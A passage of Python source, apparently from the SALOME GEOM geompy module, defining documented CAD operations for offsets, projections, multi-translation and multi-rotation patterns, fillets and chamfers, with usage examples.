# new GEOM.GEOM_Object, containing the result of offset operation if @a theCopy flag is @c True.
@ManageTransactions("TrsfOp")
def Offset(self, theObject, theOffset, theCopy=False):
"""
Offset the given shape.
Parameters:
theObject The base object for the offset.
theOffset Offset value.
theCopy Flag used to offset object itself or create a copy.
Returns:
Modified theObject (GEOM.GEOM_Object) if theCopy flag is False (default) or
new GEOM.GEOM_Object, containing the result of offset operation if theCopy flag is True.
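Example of usage (a minimal sketch; the box is an assumption created here for illustration):
box = geompy.MakeBoxDXDYDZ(100, 100, 100)
# offset the object itself, without creating a copy
geompy.Offset(box, 20., theCopy=False)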
"""
theOffset, Parameters = ParseParameters(theOffset)
if theCopy:
anObj = self.TrsfOp.OffsetShapeCopy(theObject, theOffset)
else:
anObj = self.TrsfOp.OffsetShape(theObject, theOffset)
RaiseIfFailed("Offset", self.TrsfOp)
anObj.SetParameters(Parameters)
return anObj
## Create new object as offset of the given one.
# @param theObject The base object for the offset.
# @param theOffset Offset value.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the offset object.
#
# @ref tui_offset "Example"
@ManageTransactions("TrsfOp")
def MakeOffset(self, theObject, theOffset, theName=None):
"""
Create new object as offset of the given one.
Parameters:
theObject The base object for the offset.
theOffset Offset value.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the offset object.
Example of usage:
box = geompy.MakeBox(20, 20, 20, 200, 200, 200)
# create a new object as offset of the given object
offset = geompy.MakeOffset(box, 70.)
"""
# Example: see GEOM_TestAll.py
theOffset, Parameters = ParseParameters(theOffset)
anObj = self.TrsfOp.OffsetShapeCopy(theObject, theOffset)
RaiseIfFailed("OffsetShapeCopy", self.TrsfOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "offset")
return anObj
## Create new object as projection of the given one on a 2D surface.
# @param theSource The source object for the projection. It can be a point, edge or wire.
# @param theTarget The target object. It can be planar or cylindrical face.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the projection.
#
# @ref tui_projection "Example"
@ManageTransactions("TrsfOp")
def MakeProjection(self, theSource, theTarget, theName=None):
"""
Create new object as projection of the given one on a 2D surface.
Parameters:
theSource The source object for the projection. It can be a point, edge or wire.
theTarget The target object. It can be planar or cylindrical face.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the projection.
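Example of usage (a minimal sketch; 'edge' and the planar 'face' are assumed to exist):
projection = geompy.MakeProjection(edge, face)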
"""
# Example: see GEOM_TestAll.py
anObj = self.TrsfOp.ProjectShapeCopy(theSource, theTarget)
RaiseIfFailed("ProjectShapeCopy", self.TrsfOp)
self._autoPublish(anObj, theName, "projection")
return anObj
## Create a projection of the given point on a wire or an edge.
# If there is no solution or there are two or more solutions, an
# exception is raised.
# @param thePoint the point to be projected.
# @param theWire the wire. The edge is accepted as well.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return [\a u, \a PointOnEdge, \a EdgeInWireIndex]
# \n \a u: The parameter of projection point on edge.
# \n \a PointOnEdge: The projection point.
# \n \a EdgeInWireIndex: The index of an edge in a wire.
#
# @ref tui_projection "Example"
@ManageTransactions("TrsfOp")
def MakeProjectionOnWire(self, thePoint, theWire, theName=None):
"""
Create a projection of the given point on a wire or an edge.
If there is no solution or there are two or more solutions, an
exception is raised.
Parameters:
thePoint the point to be projected.
theWire the wire. The edge is accepted as well.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
[u, PointOnEdge, EdgeInWireIndex]
u: The parameter of projection point on edge.
PointOnEdge: The projection point.
EdgeInWireIndex: The index of an edge in a wire.
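Example of usage (a minimal sketch; 'wire' is assumed to be an existing wire):
p = geompy.MakeVertex(10, 10, 10)
u, point_on_edge, edge_index = geompy.MakeProjectionOnWire(p, wire)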
"""
# Example: see GEOM_TestAll.py
anObj = self.TrsfOp.ProjectPointOnWire(thePoint, theWire)
RaiseIfFailed("ProjectPointOnWire", self.TrsfOp)
self._autoPublish(anObj[1], theName, "projection")
return anObj
# -----------------------------------------------------------------------------
# Patterns
# -----------------------------------------------------------------------------
## Translate the given object along the given vector a given number of times
# @param theObject The object to be translated.
# @param theVector Direction of the translation. DX if None.
# @param theStep Distance to translate on.
# @param theNbTimes Quantity of translations to be done.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing compound of all
# the shapes, obtained after each translation.
#
# @ref tui_multi_translation "Example"
@ManageTransactions("TrsfOp")
def MakeMultiTranslation1D(self, theObject, theVector, theStep, theNbTimes, theName=None):
"""
Translate the given object along the given vector a given number of times
Parameters:
theObject The object to be translated.
theVector Direction of the translation. DX if None.
theStep Distance to translate on.
theNbTimes Quantity of translations to be done.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing compound of all
the shapes, obtained after each translation.
Example of usage:
r1d = geompy.MakeMultiTranslation1D(prism, vect, 20, 4)
"""
# Example: see GEOM_TestAll.py
theStep, theNbTimes, Parameters = ParseParameters(theStep, theNbTimes)
anObj = self.TrsfOp.MultiTranslate1D(theObject, theVector, theStep, theNbTimes)
RaiseIfFailed("MultiTranslate1D", self.TrsfOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "multitranslation")
return anObj
## Consecutively apply two specified translations to theObject a specified number of times.
# @param theObject The object to be translated.
# @param theVector1 Direction of the first translation. DX if None.
# @param theStep1 Step of the first translation.
# @param theNbTimes1 Quantity of translations to be done along theVector1.
# @param theVector2 Direction of the second translation. DY if None.
# @param theStep2 Step of the second translation.
# @param theNbTimes2 Quantity of translations to be done along theVector2.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing compound of all
# the shapes, obtained after each translation.
#
# @ref tui_multi_translation "Example"
@ManageTransactions("TrsfOp")
def MakeMultiTranslation2D(self, theObject, theVector1, theStep1, theNbTimes1,
theVector2, theStep2, theNbTimes2, theName=None):
"""
Consecutively apply two specified translations to theObject a specified number of times.
Parameters:
theObject The object to be translated.
theVector1 Direction of the first translation. DX if None.
theStep1 Step of the first translation.
theNbTimes1 Quantity of translations to be done along theVector1.
theVector2 Direction of the second translation. DY if None.
theStep2 Step of the second translation.
theNbTimes2 Quantity of translations to be done along theVector2.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing compound of all
the shapes, obtained after each translation.
Example of usage:
tr2d = geompy.MakeMultiTranslation2D(prism, vect1, 20, 4, vect2, 80, 3)
"""
# Example: see GEOM_TestAll.py
theStep1,theNbTimes1,theStep2,theNbTimes2, Parameters = ParseParameters(theStep1,theNbTimes1,theStep2,theNbTimes2)
anObj = self.TrsfOp.MultiTranslate2D(theObject, theVector1, theStep1, theNbTimes1,
theVector2, theStep2, theNbTimes2)
RaiseIfFailed("MultiTranslate2D", self.TrsfOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "multitranslation")
return anObj
## Rotate the given object around the given axis a given number of times.
# Rotation angle will be 2*PI/theNbTimes.
# @param theObject The object to be rotated.
# @param theAxis The rotation axis. DZ if None.
# @param theNbTimes Quantity of rotations to be done.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing compound of all the
# shapes, obtained after each rotation.
#
# @ref tui_multi_rotation "Example"
@ManageTransactions("TrsfOp")
def MultiRotate1DNbTimes (self, theObject, theAxis, theNbTimes, theName=None):
"""
Rotate the given object around the given axis a given number of times.
Rotation angle will be 2*PI/theNbTimes.
Parameters:
theObject The object to be rotated.
theAxis The rotation axis. DZ if None.
theNbTimes Quantity of rotations to be done.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing compound of all the
shapes, obtained after each rotation.
Example of usage:
rot1d = geompy.MultiRotate1DNbTimes(prism, vect, 4)
"""
# Example: see GEOM_TestAll.py
theNbTimes, Parameters = ParseParameters(theNbTimes)
anObj = self.TrsfOp.MultiRotate1D(theObject, theAxis, theNbTimes)
RaiseIfFailed("MultiRotate1DNbTimes", self.TrsfOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "multirotation")
return anObj
## Rotate the given object around the given axis
# a given number of times by the given angle.
# @param theObject The object to be rotated.
# @param theAxis The rotation axis. DZ if None.
# @param theAngleStep Rotation angle in radians.
# @param theNbTimes Quantity of rotations to be done.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing compound of all the
# shapes, obtained after each rotation.
#
# @ref tui_multi_rotation "Example"
@ManageTransactions("TrsfOp")
def MultiRotate1DByStep(self, theObject, theAxis, theAngleStep, theNbTimes, theName=None):
"""
Rotate the given object around the given axis
a given number of times by the given angle.
Parameters:
theObject The object to be rotated.
theAxis The rotation axis. DZ if None.
theAngleStep Rotation angle in radians.
theNbTimes Quantity of rotations to be done.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing compound of all the
shapes, obtained after each rotation.
Example of usage:
rot1d = geompy.MultiRotate1DByStep(prism, vect, math.pi/4, 4)
"""
# Example: see GEOM_TestAll.py
theAngleStep, theNbTimes, Parameters = ParseParameters(theAngleStep, theNbTimes)
anObj = self.TrsfOp.MultiRotate1DByStep(theObject, theAxis, theAngleStep, theNbTimes)
RaiseIfFailed("MultiRotate1DByStep", self.TrsfOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "multirotation")
return anObj
## Rotate the given object around the given axis a given
# number of times and multi-translate each rotation result.
# Rotation angle will be 2*PI/theNbTimes1.
# Translation direction passes through center of gravity
# of rotated shape and its projection on the rotation axis.
# @param theObject The object to be rotated.
# @param theAxis Rotation axis. DZ if None.
# @param theNbTimes1 Quantity of rotations to be done.
# @param theRadialStep Translation distance.
# @param theNbTimes2 Quantity of translations to be done.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing compound of all the
# shapes, obtained after each transformation.
#
# @ref tui_multi_rotation "Example"
@ManageTransactions("TrsfOp")
def MultiRotate2DNbTimes(self, theObject, theAxis, theNbTimes1, theRadialStep, theNbTimes2, theName=None):
"""
Rotate the given object around the given axis a given
number of times and multi-translate each rotation result.
Rotation angle will be 2*PI/theNbTimes1.
Translation direction passes through center of gravity
of rotated shape and its projection on the rotation axis.
Parameters:
theObject The object to be rotated.
theAxis Rotation axis. DZ if None.
theNbTimes1 Quantity of rotations to be done.
theRadialStep Translation distance.
theNbTimes2 Quantity of translations to be done.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing compound of all the
shapes, obtained after each transformation.
Example of usage:
rot2d = geompy.MultiRotate2DNbTimes(prism, vect, 4, 50, 5)
"""
# Example: see GEOM_TestAll.py
theNbTimes1, theRadialStep, theNbTimes2, Parameters = ParseParameters(theNbTimes1, theRadialStep, theNbTimes2)
anObj = self.TrsfOp.MultiRotate2DNbTimes(theObject, theAxis, theNbTimes1, theRadialStep, theNbTimes2)
RaiseIfFailed("MultiRotate2DNbTimes", self.TrsfOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "multirotation")
return anObj
## Rotate the given object around the
# given axis by the given angle a given number
# of times and multi-translate each rotation result.
# Translation direction passes through center of gravity
# of rotated shape and its projection on the rotation axis.
# @param theObject The object to be rotated.
# @param theAxis Rotation axis. DZ if None.
# @param theAngleStep Rotation angle in radians.
# @param theNbTimes1 Quantity of rotations to be done.
# @param theRadialStep Translation distance.
# @param theNbTimes2 Quantity of translations to be done.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing compound of all the
# shapes, obtained after each transformation.
#
# @ref tui_multi_rotation "Example"
@ManageTransactions("TrsfOp")
def MultiRotate2DByStep (self, theObject, theAxis, theAngleStep, theNbTimes1, theRadialStep, theNbTimes2, theName=None):
"""
Rotate the given object around the
given axis by the given angle a given number
of times and multi-translate each rotation result.
Translation direction passes through center of gravity
of rotated shape and its projection on the rotation axis.
Parameters:
theObject The object to be rotated.
theAxis Rotation axis. DZ if None.
theAngleStep Rotation angle in radians.
theNbTimes1 Quantity of rotations to be done.
theRadialStep Translation distance.
theNbTimes2 Quantity of translations to be done.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing compound of all the
shapes, obtained after each transformation.
Example of usage:
rot2d = geompy.MultiRotate2DByStep(prism, vect, math.pi/3, 4, 50, 5)
"""
# Example: see GEOM_TestAll.py
theAngleStep, theNbTimes1, theRadialStep, theNbTimes2, Parameters = ParseParameters(theAngleStep, theNbTimes1, theRadialStep, theNbTimes2)
anObj = self.TrsfOp.MultiRotate2DByStep(theObject, theAxis, theAngleStep, theNbTimes1, theRadialStep, theNbTimes2)
RaiseIfFailed("MultiRotate2DByStep", self.TrsfOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "multirotation")
return anObj
## The same, as MultiRotate1DNbTimes(), but axis is given by direction and point
#
# @ref swig_MakeMultiRotation "Example"
def MakeMultiRotation1DNbTimes(self, aShape, aDir, aPoint, aNbTimes, theName=None):
"""
The same, as geompy.MultiRotate1DNbTimes, but axis is given by direction and point
Example of usage:
pz = geompy.MakeVertex(0, 0, 100)
vy = geompy.MakeVectorDXDYDZ(0, 100, 0)
MultiRot1D = geompy.MakeMultiRotation1DNbTimes(prism, vy, pz, 6)
"""
# Example: see GEOM_TestOthers.py
aVec = self.MakeLine(aPoint,aDir)
# note: auto-publishing is done in self.MultiRotate1DNbTimes()
anObj = self.MultiRotate1DNbTimes(aShape, aVec, aNbTimes, theName)
return anObj
## The same, as MultiRotate1DByStep(), but axis is given by direction and point
#
# @ref swig_MakeMultiRotation "Example"
def MakeMultiRotation1DByStep(self, aShape, aDir, aPoint, anAngle, aNbTimes, theName=None):
"""
The same, as geompy.MultiRotate1DByStep, but axis is given by direction and point
Example of usage:
pz = geompy.MakeVertex(0, 0, 100)
vy = geompy.MakeVectorDXDYDZ(0, 100, 0)
MultiRot1D = geompy.MakeMultiRotation1DByStep(prism, vy, pz, math.pi/3, 6)
"""
# Example: see GEOM_TestOthers.py
aVec = self.MakeLine(aPoint,aDir)
# note: auto-publishing is done in self.MultiRotate1DByStep()
anObj = self.MultiRotate1DByStep(aShape, aVec, anAngle, aNbTimes, theName)
return anObj
## The same, as MultiRotate2DNbTimes(), but axis is given by direction and point
#
# @ref swig_MakeMultiRotation "Example"
def MakeMultiRotation2DNbTimes(self, aShape, aDir, aPoint, nbtimes1, aStep, nbtimes2, theName=None):
"""
The same, as MultiRotate2DNbTimes(), but axis is given by direction and point
Example of usage:
pz = geompy.MakeVertex(0, 0, 100)
vy = geompy.MakeVectorDXDYDZ(0, 100, 0)
MultiRot2D = geompy.MakeMultiRotation2DNbTimes(f12, vy, pz, 6, 30, 3)
"""
# Example: see GEOM_TestOthers.py
aVec = self.MakeLine(aPoint,aDir)
# note: auto-publishing is done in self.MultiRotate2DNbTimes()
anObj = self.MultiRotate2DNbTimes(aShape, aVec, nbtimes1, aStep, nbtimes2, theName)
return anObj
## The same, as MultiRotate2DByStep(), but axis is given by direction and point
#
# @ref swig_MakeMultiRotation "Example"
def MakeMultiRotation2DByStep(self, aShape, aDir, aPoint, anAngle, nbtimes1, aStep, nbtimes2, theName=None):
"""
The same, as MultiRotate2DByStep(), but axis is given by direction and point
Example of usage:
pz = geompy.MakeVertex(0, 0, 100)
vy = geompy.MakeVectorDXDYDZ(0, 100, 0)
MultiRot2D = geompy.MakeMultiRotation2DByStep(f12, vy, pz, math.pi/4, 6, 30, 3)
"""
# Example: see GEOM_TestOthers.py
aVec = self.MakeLine(aPoint,aDir)
# note: auto-publishing is done in self.MultiRotate2DByStep()
anObj = self.MultiRotate2DByStep(aShape, aVec, anAngle, nbtimes1, aStep, nbtimes2, theName)
return anObj
# end of l3_transform
## @}
## @addtogroup l3_transform_d
## @{
## Deprecated method. Use MultiRotate1DNbTimes instead.
def MultiRotate1D(self, theObject, theAxis, theNbTimes, theName=None):
"""
Deprecated method. Use MultiRotate1DNbTimes instead.
"""
print "The method MultiRotate1D is DEPRECATED. Use MultiRotate1DNbTimes instead."
return self.MultiRotate1DNbTimes(theObject, theAxis, theNbTimes, theName)
## The same, as MultiRotate2DByStep(), but theAngle is in degrees.
# This method is DEPRECATED. Use MultiRotate2DByStep() instead.
@ManageTransactions("TrsfOp")
def MultiRotate2D(self, theObject, theAxis, theAngle, theNbTimes1, theStep, theNbTimes2, theName=None):
"""
The same, as MultiRotate2DByStep(), but theAngle is in degrees.
This method is DEPRECATED. Use MultiRotate2DByStep() instead.
Example of usage:
rot2d = geompy.MultiRotate2D(prism, vect, 60, 4, 50, 5)
"""
print "The method MultiRotate2D is DEPRECATED. Use MultiRotate2DByStep instead."
theAngle, theNbTimes1, theStep, theNbTimes2, Parameters = ParseParameters(theAngle, theNbTimes1, theStep, theNbTimes2)
anObj = self.TrsfOp.MultiRotate2D(theObject, theAxis, theAngle, theNbTimes1, theStep, theNbTimes2)
RaiseIfFailed("MultiRotate2D", self.TrsfOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "multirotation")
return anObj
## The same, as MultiRotate1D(), but axis is given by direction and point
# This method is DEPRECATED. Use MakeMultiRotation1DNbTimes instead.
def MakeMultiRotation1D(self, aShape, aDir, aPoint, aNbTimes, theName=None):
"""
The same, as geompy.MultiRotate1D, but axis is given by direction and point.
This method is DEPRECATED. Use MakeMultiRotation1DNbTimes instead.
Example of usage:
pz = geompy.MakeVertex(0, 0, 100)
vy = geompy.MakeVectorDXDYDZ(0, 100, 0)
MultiRot1D = geompy.MakeMultiRotation1D(prism, vy, pz, 6)
"""
print "The method MakeMultiRotation1D is DEPRECATED. Use MakeMultiRotation1DNbTimes instead."
aVec = self.MakeLine(aPoint,aDir)
# note: auto-publishing is done in self.MultiRotate1D()
anObj = self.MultiRotate1D(aShape, aVec, aNbTimes, theName)
return anObj
## The same, as MultiRotate2D(), but axis is given by direction and point
# This method is DEPRECATED. Use MakeMultiRotation2DByStep instead.
def MakeMultiRotation2D(self, aShape, aDir, aPoint, anAngle, nbtimes1, aStep, nbtimes2, theName=None):
"""
The same, as MultiRotate2D(), but axis is given by direction and point
This method is DEPRECATED. Use MakeMultiRotation2DByStep instead.
Example of usage:
pz = geompy.MakeVertex(0, 0, 100)
vy = geompy.MakeVectorDXDYDZ(0, 100, 0)
MultiRot2D = geompy.MakeMultiRotation2D(f12, vy, pz, 45, 6, 30, 3)
"""
print "The method MakeMultiRotation2D is DEPRECATED. Use MakeMultiRotation2DByStep instead."
aVec = self.MakeLine(aPoint,aDir)
# note: auto-publishing is done in self.MultiRotate2D()
anObj = self.MultiRotate2D(aShape, aVec, anAngle, nbtimes1, aStep, nbtimes2, theName)
return anObj
# end of l3_transform_d
## @}
## @addtogroup l3_local
## @{
## Perform a fillet on all edges of the given shape.
# @param theShape Shape, to perform fillet on.
# @param theR Fillet radius.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the result shape.
#
# @ref tui_fillet "Example 1"
# \n @ref swig_MakeFilletAll "Example 2"
@ManageTransactions("LocalOp")
def MakeFilletAll(self, theShape, theR, theName=None):
"""
Perform a fillet on all edges of the given shape.
Parameters:
theShape Shape, to perform fillet on.
theR Fillet radius.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the result shape.
Example of usage:
filletall = geompy.MakeFilletAll(prism, 10.)
"""
# Example: see GEOM_TestOthers.py
theR,Parameters = ParseParameters(theR)
anObj = self.LocalOp.MakeFilletAll(theShape, theR)
RaiseIfFailed("MakeFilletAll", self.LocalOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "fillet")
return anObj
## Perform a fillet on the specified edges/faces of the given shape
# @param theShape Shape, to perform fillet on.
# @param theR Fillet radius.
# @param theShapeType Type of shapes in <VAR>theListShapes</VAR> (see ShapeType())
# @param theListShapes Global indices of edges/faces to perform fillet on.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @note Global index of sub-shape can be obtained, using method GetSubShapeID().
#
# @return New GEOM.GEOM_Object, containing the result shape.
#
# @ref tui_fillet "Example"
@ManageTransactions("LocalOp")
def MakeFillet(self, theShape, theR, theShapeType, theListShapes, theName=None):
"""
Perform a fillet on the specified edges/faces of the given shape
Parameters:
theShape Shape, to perform fillet on.
theR Fillet radius.
theShapeType Type of shapes in theListShapes (see geompy.ShapeType)
theListShapes Global indices of edges/faces to perform fillet on.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Note:
Global index of sub-shape can be obtained, using method geompy.GetSubShapeID
Returns:
New GEOM.GEOM_Object, containing the result shape.
Example of usage:
# get the list of IDs (IDList) for the fillet
prism_edges = geompy.SubShapeAllSortedCentres(prism, geompy.ShapeType["EDGE"])
IDlist_e = []
IDlist_e.append(geompy.GetSubShapeID(prism, prism_edges[0]))
IDlist_e.append(geompy.GetSubShapeID(prism, prism_edges[1]))
IDlist_e.append(geompy.GetSubShapeID(prism, prism_edges[2]))
# make a fillet on the specified edges of the given shape
fillet = geompy.MakeFillet(prism, 10., geompy.ShapeType["EDGE"], IDlist_e)
"""
# Example: see GEOM_TestAll.py
theR,Parameters = ParseParameters(theR)
anObj = None
if theShapeType == self.ShapeType["EDGE"]:
anObj = self.LocalOp.MakeFilletEdges(theShape, theR, theListShapes)
RaiseIfFailed("MakeFilletEdges", self.LocalOp)
else:
anObj = self.LocalOp.MakeFilletFaces(theShape, theR, theListShapes)
RaiseIfFailed("MakeFilletFaces", self.LocalOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "fillet")
return anObj
## The same that MakeFillet() but with two Fillet Radius R1 and R2
@ManageTransactions("LocalOp")
def MakeFilletR1R2(self, theShape, theR1, theR2, theShapeType, theListShapes, theName=None):
"""
The same that geompy.MakeFillet but with two Fillet Radius R1 and R2
Example of usage:
# get the list of IDs (IDList) for the fillet
prism_edges = geompy.SubShapeAllSortedCentres(prism, geompy.ShapeType["EDGE"])
IDlist_e = []
IDlist_e.append(geompy.GetSubShapeID(prism, prism_edges[0]))
IDlist_e.append(geompy.GetSubShapeID(prism, prism_edges[1]))
IDlist_e.append(geompy.GetSubShapeID(prism, prism_edges[2]))
# make a fillet on the specified edges of the given shape
fillet = geompy.MakeFilletR1R2(prism, 10., 15., geompy.ShapeType["EDGE"], IDlist_e)
"""
theR1,theR2,Parameters = ParseParameters(theR1,theR2)
anObj = None
if theShapeType == self.ShapeType["EDGE"]:
anObj = self.LocalOp.MakeFilletEdgesR1R2(theShape, theR1, theR2, theListShapes)
RaiseIfFailed("MakeFilletEdgesR1R2", self.LocalOp)
else:
anObj = self.LocalOp.MakeFilletFacesR1R2(theShape, theR1, theR2, theListShapes)
RaiseIfFailed("MakeFilletFacesR1R2", self.LocalOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "fillet")
return anObj
## Perform a fillet at the specified vertices of the given wire.
# @param theShape Wire Shape to perform fillet on.
# @param theR Fillet radius.
# @param theListOfVertexes Global indices of vertexes to perform fillet on.
# \note Global index of sub-shape can be obtained, using method GetSubShapeID()
# \note The list of vertices could be empty,
# in this case the fillet will be done at all vertices of the wire
# @param doIgnoreSecantVertices If FALSE, fillet radius is always limited
# by the length of the edges, nearest to the fillet vertex.
# But sometimes the next edge is C1 continuous with the one, nearest to
# the fillet point, and such two (or more) edges can be united to allow
# bigger radius. Set this flag to TRUE to allow collinear edges union,
# thus ignoring the secant vertex (vertices).
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the result shape.
#
# @ref tui_fillet2d "Example"
@ManageTransactions("LocalOp")
def MakeFillet1D(self, theShape, theR, theListOfVertexes, doIgnoreSecantVertices = True, theName=None):
"""
Perform a fillet at the specified vertices of the given wire.
Parameters:
theShape Wire Shape to perform fillet on.
theR Fillet radius.
theListOfVertexes Global indices of vertexes to perform fillet on.
doIgnoreSecantVertices If FALSE, fillet radius is always limited
by the length of the edges, nearest to the fillet vertex.
But sometimes the next edge is C1 continuous with the one, nearest to
the fillet point, and such two (or more) edges can be united to allow
bigger radius. Set this flag to TRUE to allow collinear edges union,
thus ignoring the secant vertex (vertices).
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Note:
Global index of sub-shape can be obtained, using method geompy.GetSubShapeID
The list of vertices could be empty; in this case the fillet will be done at all vertices of the wire
Returns:
New GEOM.GEOM_Object, containing the result shape.
Example of usage:
# create wire
Wire_1 = geompy.MakeWire([Edge_12, Edge_7, Edge_11, Edge_6, Edge_1, Edge_4])
# make a fillet at the given wire vertices with the given radius
Fillet_1D_1 = geompy.MakeFillet1D(Wire_1, 55, [3, 4, 6, 8, 10])
"""
# Example: see GEOM_TestAll.py
theR,doIgnoreSecantVertices,Parameters = ParseParameters(theR,doIgnoreSecantVertices)
anObj = self.LocalOp.MakeFillet1D(theShape, theR, theListOfVertexes, doIgnoreSecantVertices)
RaiseIfFailed("MakeFillet1D", self.LocalOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "fillet")
return anObj
## Perform a fillet at the specified vertices of the given face/shell.
# @param theShape Face or Shell shape to perform fillet on.
# @param theR Fillet radius.
# @param theListOfVertexes Global indices of vertexes to perform fillet on.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @note Global index of sub-shape can be obtained, using method GetSubShapeID().
#
# @return New GEOM.GEOM_Object, containing the result shape.
#
# @ref tui_fillet2d "Example"
@ManageTransactions("LocalOp")
def MakeFillet2D(self, theShape, theR, theListOfVertexes, theName=None):
"""
Perform a fillet at the specified vertices of the given face/shell.
Parameters:
theShape Face or Shell shape to perform fillet on.
theR Fillet radius.
theListOfVertexes Global indices of vertexes to perform fillet on.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Note:
Global index of sub-shape can be obtained, using method geompy.GetSubShapeID
Returns:
New GEOM.GEOM_Object, containing the result shape.
Example of usage:
face = geompy.MakeFaceHW(100, 100, 1)
fillet2d = geompy.MakeFillet2D(face, 30, [7, 9])
"""
# Example: see GEOM_TestAll.py
theR,Parameters = ParseParameters(theR)
anObj = self.LocalOp.MakeFillet2D(theShape, theR, theListOfVertexes)
RaiseIfFailed("MakeFillet2D", self.LocalOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "fillet")
return anObj
## Perform a symmetric chamfer on all edges of the given shape.
# @param theShape Shape, to perform chamfer on.
# @param theD Chamfer size along each face.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the result shape.
#
# @ref tui_chamfer "Example 1"
# \n @ref swig_MakeChamferAll "Example 2"
@ManageTransactions("LocalOp")
def MakeChamferAll(self, theShape, theD, theName=None):
"""
Perform a symmetric chamfer on all edges of the given shape.
Parameters:
theShape Shape, to perform chamfer on.
theD Chamfer size along each face.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the result shape.
Example of usage:
chamfer_all = geompy.MakeChamferAll(prism, 10.)
"""
# Example: see GEOM_TestOthers.py
theD,Parameters = ParseParameters(theD)
anObj = self.LocalOp.MakeChamferAll(theShape, theD)
RaiseIfFailed("MakeChamferAll", self.LocalOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "chamfer")
return anObj
## Perform a chamfer on edges, common to the specified faces,
# with distance D1 along theFace1
# @param theShape Shape, to perform chamfer on.
# @param theD1 Chamfer size along \a theFace1.
# @param theD2 Chamfer size along \a theFace2.
# @param theFace1,theFace2 Global indices of two faces of \a theShape.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @note Global index of sub-shape can be obtained, using method GetSubShapeID().
#
# @return New GEOM.GEOM_Object, containing the result shape.
#
# @ref tui_chamfer "Example"
@ManageTransactions("LocalOp")
def MakeChamferEdge(self, theShape, theD1, theD2, theFace1, theFace2, theName=None):
"""
Perform a chamfer on edges, common to the specified faces,
with distance D1 along theFace1
Parameters:
